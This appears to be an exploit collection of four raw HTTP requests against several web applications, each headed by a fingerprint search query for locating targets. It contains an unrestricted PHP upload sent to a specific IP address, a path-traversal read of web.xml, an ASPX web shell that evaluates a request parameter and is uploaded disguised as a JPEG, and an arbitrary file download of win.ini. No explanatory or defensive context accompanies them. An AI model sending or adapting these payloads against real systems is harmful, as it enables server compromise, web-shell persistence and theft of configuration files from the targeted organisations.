1.body="/public/ui/js/bgstretcher.js"
POST /public/upload/index.php?name=file1 HTTP/1.1
Host: 47.95.231.149:8003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=51rh1pihrpqv3i7qdj7mvvokk0; ValidateCode=0610
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIrn9rJBl
Content-Length: 181

------WebKitFormBoundaryIrn9rJBl
Content-Disposition: form-data; name="file1[]";filename="test.php"

<?php echo md5(123);unlink(__FILE__);?>
------WebKitFormBoundaryIrn9rJBl--

2.web.icon="494d1a9cf585c0b6b45462a224fccd90"
GET /CommonServlet?operation=getWorkFlowFile&fileName=../../website/WEB-INF/web.xml HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

3.body="fish/lib/MakFishBone.js"
POST /api/RC_File/UploadFile HTTP/1.1
Host: x
Content-Length: 266
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.46
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzc1AoAqqRDjFCLDe
Accept: */*
Origin: http://x
Referer: http://x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryzc1AoAqqRDjFCLDe
Content-Disposition: form-data; name="file"; filename="avatar.88f3e43c.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript"%>
<% eval(Request.Item["ant"],"unsafe"); %>
------WebKitFormBoundaryzc1AoAqqRDjFCLDe--

4.body="Standard/DownSoftFile"

GET /Excel/Download?file=C:/Windows/win.ini HTTP/1.1